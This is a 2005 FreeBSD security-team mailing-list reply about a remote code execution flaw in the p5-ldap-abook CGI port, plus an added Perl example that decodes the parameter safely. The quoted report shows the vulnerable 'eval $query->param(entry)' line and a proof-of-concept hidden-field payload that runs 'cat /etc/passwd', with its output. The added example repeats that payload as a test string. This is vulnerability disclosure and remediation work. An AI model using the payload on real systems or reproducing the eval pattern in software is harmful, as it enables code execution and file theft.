Date:      Fri, 18 Nov 2005 11:17:47 +0100
From:      "Simon L. Nielsen" <simon@FreeBSD.org>
To:        Roman Mashirov <mrj@mrj.spb.ru>
Cc:        ports@FreeBSD.org, security@FreeBSD.org
Subject:   Re: FreeBSD Port: p5-ldap-abook-1.00
Message-ID:  <20051118101746.GB98443@eddie.nitro.dk>
In-Reply-To: <437DA508.8070409@mrj.spb.ru>
References:  <437DA508.8070409@mrj.spb.ru>

On 2005.11.18 12:55:20 +0300, Roman Mashirov wrote:

> This cgi script contains remote code exec. In the following code (line 128):
> my $attr = eval $query->param(entry);
> script directly evaluates cgi parameter, received from client, so <input
> type=hidden name=entry value="system 'cat /etc/passwd';"> leads to the
> following output from script:
>
> # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
> # root:*:0:0:Charlie &:/root:/bin/csh

Yay! :-/

Have you tried to exploit it and verified that this exploit works?  (I
don't see any input checking from a quick check but I cannot check
before tonight CET).

-- 
Simon L. Nielsen
FreeBSD Security Team
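
The hazard reported in the quoted text is string `eval` applied to a client-controlled CGI parameter. The following is an added example, not part of the original message or of the port's code, showing the parameter handled as data only. It assumes `entry` carries a map of attribute names to values; the JSON encoding, the allow-list and `parse_entry` are hypothetical.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use JSON::PP ();

# Assumption: 'entry' is a map of LDAP attribute names to values.
# Hypothetical allow-list; adjust to the schema actually in use.
my %ALLOWED = map { $_ => 1 } qw(cn sn givenName mail telephoneNumber);

# Decode the untrusted parameter as data; JSON has no executable form.
# Returns a hashref of validated attributes, or undef when rejected.
sub parse_entry {
    my ($raw) = @_;
    return unless defined $raw && length($raw) <= 4096;
    # Block eval only traps the decoder's exception; it never runs $raw.
    my $data = eval { JSON::PP->new->utf8->decode($raw) };
    return unless ref($data) eq 'HASH';
    my %attr;
    for my $name (keys %$data) {
        return unless $ALLOWED{$name};
        my $v = $data->{$name};
        my @values = ref($v) eq 'ARRAY' ? @$v : ($v);
        for my $val (@values) {
            # Reject null, nested structures, oversized or control-char values.
            return if !defined $val || ref $val;
            return if length($val) > 256 || $val =~ /[\x00-\x1f]/;
        }
        $attr{$name} = [@values];
    }
    return \%attr;
}

# Constructed sample inputs.
my @samples = (
    '{"cn":"Jane Doe","mail":["jane@example.org"]}',
    q{system 'cat /etc/passwd';},   # string from the report: not JSON
    '{"objectClass":"top"}',        # attribute outside the allow-list
);
for my $raw (@samples) {
    my $attr = parse_entry($raw);
    my $verdict = $attr ? 'accepted: ' . join(',', sort keys %$attr) : 'rejected';
    print "$verdict\n";
}
```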
